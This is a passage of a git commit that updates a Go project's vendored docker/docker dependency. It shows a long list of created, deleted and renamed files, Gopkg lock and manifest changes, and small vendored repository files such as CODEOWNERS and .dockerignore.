vendor/github.com/docker/docker/integration/service/network_test.go create mode 100644 vendor/github.com/docker/docker/integration/service/plugin_test.go create mode 100644 vendor/github.com/docker/docker/integration/session/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/session/session_test.go create mode 100644 vendor/github.com/docker/docker/integration/system/cgroupdriver_systemd_test.go create mode 100644 vendor/github.com/docker/docker/integration/system/event_test.go create mode 100644 vendor/github.com/docker/docker/integration/system/info_linux_test.go create mode 100644 vendor/github.com/docker/docker/integration/system/info_test.go create mode 100644 vendor/github.com/docker/docker/integration/system/login_test.go create mode 100644 vendor/github.com/docker/docker/integration/system/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/system/version_test.go create mode 100644 vendor/github.com/docker/docker/integration/testdata/https/ca.pem create mode 100644 vendor/github.com/docker/docker/integration/testdata/https/client-cert.pem create mode 100644 vendor/github.com/docker/docker/integration/testdata/https/client-key.pem create mode 100644 vendor/github.com/docker/docker/integration/testdata/https/server-cert.pem create mode 100644 vendor/github.com/docker/docker/integration/testdata/https/server-key.pem create mode 100644 vendor/github.com/docker/docker/integration/volume/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/volume/volume_test.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/config.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/container.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/daemon.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/daemon_unix.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/daemon_windows.go create mode 
100644 vendor/github.com/docker/docker/internal/test/daemon/node.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/ops.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/plugin.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/secret.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/service.go create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/swarm.go create mode 100644 vendor/github.com/docker/docker/internal/test/environment/clean.go create mode 100644 vendor/github.com/docker/docker/internal/test/environment/environment.go create mode 100644 vendor/github.com/docker/docker/internal/test/environment/protect.go create mode 100644 vendor/github.com/docker/docker/internal/test/fakecontext/context.go create mode 100644 vendor/github.com/docker/docker/internal/test/fakegit/fakegit.go create mode 100644 vendor/github.com/docker/docker/internal/test/fakestorage/fixtures.go create mode 100644 vendor/github.com/docker/docker/internal/test/fakestorage/storage.go rename vendor/github.com/docker/docker/{integration-cli => internal/test}/fixtures/load/frozen.go (60%) create mode 100644 vendor/github.com/docker/docker/internal/test/fixtures/plugin/basic/basic.go create mode 100644 vendor/github.com/docker/docker/internal/test/fixtures/plugin/plugin.go create mode 100644 vendor/github.com/docker/docker/internal/test/helper.go create mode 100644 vendor/github.com/docker/docker/internal/test/registry/ops.go create mode 100644 vendor/github.com/docker/docker/internal/test/registry/registry.go create mode 100644 vendor/github.com/docker/docker/internal/test/registry/registry_mock.go rename vendor/github.com/docker/docker/{integration-cli => internal/test/request}/npipe.go (91%) rename vendor/github.com/docker/docker/{integration-cli => internal/test/request}/npipe_windows.go (91%) create mode 100644 vendor/github.com/docker/docker/internal/test/request/ops.go 
create mode 100644 vendor/github.com/docker/docker/internal/test/request/request.go create mode 100644 vendor/github.com/docker/docker/internal/testutil/helpers.go create mode 100644 vendor/github.com/docker/docker/internal/testutil/stringutils.go create mode 100644 vendor/github.com/docker/docker/internal/testutil/stringutils_test.go create mode 100644 vendor/github.com/docker/docker/layer/filestore_unix.go create mode 100644 vendor/github.com/docker/docker/layer/filestore_windows.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/client.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_daemon.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_daemon_linux.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_daemon_windows.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/client_linux.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_local_windows.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/client_solaris.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/client_unix.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/client_windows.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/container.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/container_unix.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/container_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/errors.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/oom_linux.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/oom_solaris.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/process.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/process_unix.go rename 
vendor/github.com/docker/docker/libcontainerd/{queue_unix.go => queue.go} (70%) create mode 100644 vendor/github.com/docker/docker/libcontainerd/queue_test.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/remote.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_daemon.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_daemon_linux.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_daemon_options.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_daemon_options_linux.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_daemon_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_local.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_unix.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_windows.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/types_solaris.go delete mode 100644 vendor/github.com/docker/docker/libcontainerd/utils_solaris.go delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile.5.md delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile.aarch64 delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile.armhf delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile.ppc64le delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile.s390x delete mode 100644 vendor/github.com/docker/docker/man/README.md delete mode 100644 vendor/github.com/docker/docker/man/docker-attach.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-build.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-commit.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-config-json.5.md delete mode 100644 vendor/github.com/docker/docker/man/docker-cp.1.md delete mode 100644 
vendor/github.com/docker/docker/man/docker-create.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-diff.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-events.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-exec.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-export.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-history.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-images.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-import.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-info.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-inspect.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-kill.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-load.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-login.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-logout.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-logs.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-network-connect.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-network-create.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-network-disconnect.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-network-inspect.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-network-ls.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-network-rm.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-pause.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-port.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-ps.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-pull.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-push.1.md delete mode 100644 
vendor/github.com/docker/docker/man/docker-rename.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-restart.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-rm.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-rmi.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-run.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-save.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-search.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-start.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-stats.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-stop.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-tag.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-top.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-unpause.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-update.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-version.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker-wait.1.md delete mode 100644 vendor/github.com/docker/docker/man/docker.1.md delete mode 100644 vendor/github.com/docker/docker/man/dockerd.8.md delete mode 100644 vendor/github.com/docker/docker/man/generate.go delete mode 100755 vendor/github.com/docker/docker/man/generate.sh delete mode 100644 vendor/github.com/docker/docker/man/glide.lock delete mode 100644 vendor/github.com/docker/docker/man/glide.yaml delete mode 100755 vendor/github.com/docker/docker/man/md2man-all.sh rename vendor/github.com/docker/docker/oci/{defaults_linux.go => defaults.go} (58%) delete mode 100644 vendor/github.com/docker/docker/oci/defaults_solaris.go delete mode 100644 vendor/github.com/docker/docker/oci/defaults_windows.go create mode 100644 vendor/github.com/docker/docker/opts/address_pools.go create mode 100644 vendor/github.com/docker/docker/opts/address_pools_test.go 
create mode 100644 vendor/github.com/docker/docker/opts/env.go create mode 100644 vendor/github.com/docker/docker/opts/env_test.go delete mode 100644 vendor/github.com/docker/docker/opts/mount.go delete mode 100644 vendor/github.com/docker/docker/opts/mount_test.go delete mode 100644 vendor/github.com/docker/docker/opts/port.go delete mode 100644 vendor/github.com/docker/docker/opts/port_test.go rename vendor/github.com/docker/docker/{runconfig => }/opts/runtime.go (97%) delete mode 100644 vendor/github.com/docker/docker/opts/secret.go delete mode 100644 vendor/github.com/docker/docker/opts/secret_test.go rename vendor/github.com/docker/docker/{runconfig => }/opts/ulimit.go (65%) rename vendor/github.com/docker/docker/{runconfig => }/opts/ulimit_test.go (94%) create mode 100644 vendor/github.com/docker/docker/pkg/authorization/api_test.go create mode 100644 vendor/github.com/docker/docker/pkg/authorization/middleware_test.go create mode 100644 vendor/github.com/docker/docker/pkg/authorization/middleware_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/containerfs/archiver.go create mode 100644 vendor/github.com/docker/docker/pkg/containerfs/containerfs.go create mode 100644 vendor/github.com/docker/docker/pkg/containerfs/containerfs_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/containerfs/containerfs_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic.go rename vendor/github.com/docker/docker/pkg/devicemapper/{devmapper_wrapper_deferred_remove.go => devmapper_wrapper_dynamic_deferred_remove.go} (75%) create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_dlsym_deferred_remove.go create mode 100644 vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go delete mode 100644 
vendor/github.com/docker/docker/pkg/gitutils/gitutils.go delete mode 100644 vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/unsupported.go delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/homedir/homedir_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/homedir/homedir_others.go rename vendor/github.com/docker/docker/pkg/homedir/{homedir.go => homedir_unix.go} (75%) create mode 100644 vendor/github.com/docker/docker/pkg/homedir/homedir_windows.go delete mode 100644 vendor/github.com/docker/docker/pkg/httputils/httputils.go delete mode 100644 vendor/github.com/docker/docker/pkg/httputils/httputils_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/integration/cmd/command.go delete mode 100644 vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/integration/utils.go delete mode 100644 vendor/github.com/docker/docker/pkg/integration/utils_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fmt.go delete mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go 
delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_linux_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go delete mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go delete mode 100644 vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go delete mode 100644 vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go delete mode 100644 vendor/github.com/docker/docker/pkg/platform/utsname_int8.go delete mode 100644 vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go delete mode 100644 vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/plugins_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/transport/http_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/promise/promise.go delete mode 100644 vendor/github.com/docker/docker/pkg/random/random.go delete mode 100644 vendor/github.com/docker/docker/pkg/random/random_test.go create mode 100644 vendor/github.com/docker/docker/pkg/reexec/reexec_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/registrar/registrar.go delete mode 100644 vendor/github.com/docker/docker/pkg/registrar/registrar_test.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_linux_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_test.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/testfiles/main.go create mode 100644 
vendor/github.com/docker/docker/pkg/signal/trap_linux_test.go create mode 100644 vendor/github.com/docker/docker/pkg/streamformatter/streamwriter.go create mode 100644 vendor/github.com/docker/docker/pkg/streamformatter/streamwriter_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/stringutils/README.md delete mode 100644 vendor/github.com/docker/docker/pkg/stringutils/stringutils.go delete mode 100644 vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go delete mode 100644 vendor/github.com/docker/docker/pkg/system/events_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/init.go create mode 100644 vendor/github.com/docker/docker/pkg/system/init_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/system/init_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/lcow.go create mode 100644 vendor/github.com/docker/docker/pkg/system/lcow_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/system/lcow_windows.go rename vendor/github.com/docker/docker/pkg/system/{lstat.go => lstat_unix.go} (84%) delete mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/system/path.go delete mode 100644 vendor/github.com/docker/docker/pkg/system/path_unix.go delete mode 100644 vendor/github.com/docker/docker/pkg/system/path_windows.go rename vendor/github.com/docker/docker/{utils => pkg/system}/process_unix.go (50%) create mode 100644 vendor/github.com/docker/docker/pkg/system/process_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/rm.go create mode 100644 vendor/github.com/docker/docker/pkg/system/rm_test.go rename vendor/github.com/docker/docker/pkg/system/{stat.go => stat_unix.go} (63%) delete mode 100644 vendor/github.com/docker/docker/pkg/system/stat_unsupported.go create mode 100644 
vendor/github.com/docker/docker/pkg/term/proxy.go create mode 100644 vendor/github.com/docker/docker/pkg/term/proxy_test.go create mode 100644 vendor/github.com/docker/docker/pkg/term/tc.go delete mode 100644 vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go delete mode 100644 vendor/github.com/docker/docker/pkg/term/tc_other.go delete mode 100644 vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go create mode 100644 vendor/github.com/docker/docker/pkg/term/term_linux_test.go delete mode 100644 vendor/github.com/docker/docker/pkg/term/term_solaris.go delete mode 100644 vendor/github.com/docker/docker/pkg/term/term_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/term/termios_bsd.go delete mode 100644 vendor/github.com/docker/docker/pkg/term/termios_darwin.go delete mode 100644 vendor/github.com/docker/docker/pkg/term/termios_freebsd.go delete mode 100644 vendor/github.com/docker/docker/pkg/term/termios_openbsd.go create mode 100644 vendor/github.com/docker/docker/pkg/term/winsize.go delete mode 100644 vendor/github.com/docker/docker/pkg/testutil/assert/assert.go delete mode 100644 vendor/github.com/docker/docker/pkg/testutil/pkg.go delete mode 100644 vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go delete mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go delete mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go delete mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go create mode 100644 vendor/github.com/docker/docker/plugin/backend_linux_test.go create mode 100644 vendor/github.com/docker/docker/plugin/errors.go create mode 100644 vendor/github.com/docker/docker/plugin/events.go create mode 100644 vendor/github.com/docker/docker/plugin/executor/containerd/containerd.go create mode 100644 vendor/github.com/docker/docker/plugin/executor/containerd/containerd_test.go create mode 100644 
vendor/github.com/docker/docker/plugin/manager_linux_test.go delete mode 100644 vendor/github.com/docker/docker/plugin/manager_solaris.go create mode 100644 vendor/github.com/docker/docker/plugin/manager_test.go rename vendor/github.com/docker/docker/project/{CONTRIBUTORS.md => CONTRIBUTING.md} (100%) delete mode 100644 vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md create mode 100644 vendor/github.com/docker/docker/reference/errors.go delete mode 100644 vendor/github.com/docker/docker/reference/reference.go delete mode 100644 vendor/github.com/docker/docker/reference/reference_test.go create mode 100644 vendor/github.com/docker/docker/registry/errors.go rename vendor/github.com/docker/docker/{pkg/httputils => registry/resumable}/resumablerequestreader.go (62%) rename vendor/github.com/docker/docker/{pkg/httputils => registry/resumable}/resumablerequestreader_test.go (68%) create mode 100644 vendor/github.com/docker/docker/reports/2017-05-01.md create mode 100644 vendor/github.com/docker/docker/reports/2017-05-08.md create mode 100644 vendor/github.com/docker/docker/reports/2017-05-15.md create mode 100644 vendor/github.com/docker/docker/reports/2017-06-05.md create mode 100644 vendor/github.com/docker/docker/reports/2017-06-12.md create mode 100644 vendor/github.com/docker/docker/reports/2017-06-26.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-05-01.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-05-08.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-05-15.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-05-22.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-05-29.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-06-05.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-06-12.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-06-26.md create mode 
100644 vendor/github.com/docker/docker/reports/builder/2017-07-10.md create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-07-17.md delete mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_windows_test.go delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/envfile.go delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/envfile_test.go delete mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env delete mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16be.env delete mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf8.env delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.env delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.label delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/opts.go delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/opts_test.go delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/parse_test.go delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/throttledevice.go delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/weightdevice.go delete mode 100644 vendor/github.com/docker/docker/utils/debug.go delete mode 100644 vendor/github.com/docker/docker/utils/process_windows.go delete mode 100644 vendor/github.com/docker/docker/utils/templates/templates.go delete mode 100644 vendor/github.com/docker/docker/utils/templates/templates_test.go delete mode 100644 vendor/github.com/docker/docker/utils/utils.go create mode 100644 vendor/github.com/docker/docker/volume/mounts/lcow_parser.go create mode 100644 vendor/github.com/docker/docker/volume/mounts/linux_parser.go create mode 100644 vendor/github.com/docker/docker/volume/mounts/mounts.go create mode 100644 vendor/github.com/docker/docker/volume/mounts/parser.go create 
mode 100644 vendor/github.com/docker/docker/volume/mounts/parser_test.go create mode 100644 vendor/github.com/docker/docker/volume/mounts/validate.go create mode 100644 vendor/github.com/docker/docker/volume/mounts/validate_test.go rename vendor/github.com/docker/docker/volume/{validate_test_unix.go => mounts/validate_unix_test.go} (57%) rename vendor/github.com/docker/docker/volume/{validate_test_windows.go => mounts/validate_windows_test.go} (52%) rename vendor/github.com/docker/docker/volume/{ => mounts}/volume_copy.go (73%) create mode 100644 vendor/github.com/docker/docker/volume/mounts/volume_unix.go create mode 100644 vendor/github.com/docker/docker/volume/mounts/volume_windows.go create mode 100644 vendor/github.com/docker/docker/volume/mounts/windows_parser.go create mode 100644 vendor/github.com/docker/docker/volume/service/by.go create mode 100644 vendor/github.com/docker/docker/volume/service/convert.go rename vendor/github.com/docker/docker/volume/{store => service}/db.go (84%) create mode 100644 vendor/github.com/docker/docker/volume/service/db_test.go create mode 100644 vendor/github.com/docker/docker/volume/service/default_driver.go create mode 100644 vendor/github.com/docker/docker/volume/service/default_driver_stubs.go rename vendor/github.com/docker/docker/volume/{store => service}/errors.go (65%) create mode 100644 vendor/github.com/docker/docker/volume/service/opts/opts.go rename vendor/github.com/docker/docker/volume/{store => service}/restore.go (85%) create mode 100644 vendor/github.com/docker/docker/volume/service/restore_test.go create mode 100644 vendor/github.com/docker/docker/volume/service/service.go create mode 100644 vendor/github.com/docker/docker/volume/service/service_linux_test.go create mode 100644 vendor/github.com/docker/docker/volume/service/service_test.go rename vendor/github.com/docker/docker/volume/{store => service}/store.go (51%) create mode 100644 vendor/github.com/docker/docker/volume/service/store_test.go create mode 
100644 vendor/github.com/docker/docker/volume/service/store_unix.go rename vendor/github.com/docker/docker/volume/{store => service}/store_windows.go (59%) delete mode 100644 vendor/github.com/docker/docker/volume/store/store_test.go delete mode 100644 vendor/github.com/docker/docker/volume/store/store_unix.go delete mode 100644 vendor/github.com/docker/docker/volume/validate.go delete mode 100644 vendor/github.com/docker/docker/volume/validate_test.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_copy_unix.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_copy_windows.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_linux.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_linux_test.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_linux.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_test.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_unix.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_unsupported.go delete mode 100644 vendor/github.com/docker/docker/volume/volume_windows.go diff --git a/Gopkg.lock b/Gopkg.lock index 08daf551c6..7ae9566a29 100644 --- a/Gopkg.lock +++ b/Gopkg.lock @@ -13,12 +13,6 @@ revision = "6b2a58267f6a8b1dc8e2eb5519b984008fa85e8c" version = "v2.15.0" -[[projects]] - name = "github.com/Sirupsen/logrus" - packages = ["."] - revision = "c155da19408a8799da419ed3eeb0cb5db0ad5dbc" - version = "v1.0.5" - [[projects]] name = "github.com/aokoli/goutils" packages = ["."] @@ -44,10 +38,10 @@ version = "v1.1.0" [[projects]] + branch = "master" name = "github.com/docker/docker" packages = ["pkg/fileutils"] - revision = "092cba3727bb9b4a2f0e922cd6c0f93ea270e363" - version = "v1.13.1" + revision = 
"e2593239d949eee454935daea7a5fe025477322f" [[projects]] branch = "master" @@ -254,6 +248,12 @@ revision = "645ef00459ed84a119197bfb8d8205042c6df63d" version = "v0.8.0" +[[projects]] + name = "github.com/sirupsen/logrus" + packages = ["."] + revision = "c155da19408a8799da419ed3eeb0cb5db0ad5dbc" + version = "v1.0.5" + [[projects]] branch = "master" name = "github.com/spf13/afero" @@ -352,6 +352,6 @@ [solve-meta] analyzer-name = "dep" analyzer-version = 1 - inputs-digest = "41fa7bc4fc730240930807e113d19be175d2a8dfbca5cdf084e8285a3a150e43" + inputs-digest = "0afba7ec3d45c8cf6aea549a9ff30c674c2106f10c8f2865aee452376dcbfbe6" solver-name = "gps-cdcl" solver-version = 1 diff --git a/Gopkg.toml b/Gopkg.toml index 1d0d53b35e..38b0857452 100644 --- a/Gopkg.toml +++ b/Gopkg.toml @@ -98,5 +98,5 @@ name = "github.com/flynn-archive/go-shlex" [[constraint]] + branch = "master" name = "github.com/docker/docker" - version = "1.13.1" diff --git a/vendor/github.com/docker/docker/.DEREK.yml b/vendor/github.com/docker/docker/.DEREK.yml new file mode 100644 index 0000000000..3fd6789173 --- /dev/null +++ b/vendor/github.com/docker/docker/.DEREK.yml @@ -0,0 +1,17 @@ +curators: + - aboch + - alexellis + - andrewhsu + - anonymuse + - chanwit + - ehazlett + - fntlnz + - gianarb + - mgoelzer + - programmerq + - rheinwein + - ripcurld0 + - thajeztah + +features: + - comments diff --git a/vendor/github.com/docker/docker/.dockerignore b/vendor/github.com/docker/docker/.dockerignore index 082cac9224..4a56f2e00c 100644 --- a/vendor/github.com/docker/docker/.dockerignore +++ b/vendor/github.com/docker/docker/.dockerignore @@ -2,3 +2,6 @@ bundles .gopath vendor/pkg .go-pkg-cache +.git +hack/integration-cli-on-swarm/integration-cli-on-swarm + diff --git a/vendor/github.com/docker/docker/.github/CODEOWNERS b/vendor/github.com/docker/docker/.github/CODEOWNERS new file mode 100644 index 0000000000..9081854965 --- /dev/null +++ b/vendor/github.com/docker/docker/.github/CODEOWNERS @@ -0,0 +1,20 @@ +# 
GitHub code owners +# See https://help.github.com/articles/about-codeowners/ +# +# KEEP THIS FILE SORTED. Order is important. Last match takes precedence. + +builder/** @tonistiigi +client/** @dnephin +contrib/mkimage/** @tianon +daemon/graphdriver/devmapper/** @rhvgoyal +daemon/graphdriver/lcow/** @johnstep @jhowardmsft +daemon/graphdriver/overlay/** @dmcgowan +daemon/graphdriver/overlay2/** @dmcgowan +daemon/graphdriver/windows/** @johnstep @jhowardmsft +daemon/logger/awslogs/** @samuelkarp +hack/** @tianon +hack/integration-cli-on-swarm/** @AkihiroSuda +integration-cli/** @vdemeester +integration/** @vdemeester +plugin/** @cpuguy83 +project/** @thaJeztah diff --git a/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md b/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md index 7362480a4a..64459e8b72 100644 --- a/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md +++ b/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md @@ -10,19 +10,25 @@ information within 7 days, we cannot debug your issue and will close it. We will, however, reopen it if you later provide the information. For more information about reporting issues, see -https://github.com/docker/docker/blob/master/CONTRIBUTING.md#reporting-other-issues +https://github.com/moby/moby/blob/master/CONTRIBUTING.md#reporting-other-issues --------------------------------------------------- GENERAL SUPPORT INFORMATION --------------------------------------------------- The GitHub issue tracker is for bug reports and feature requests. 
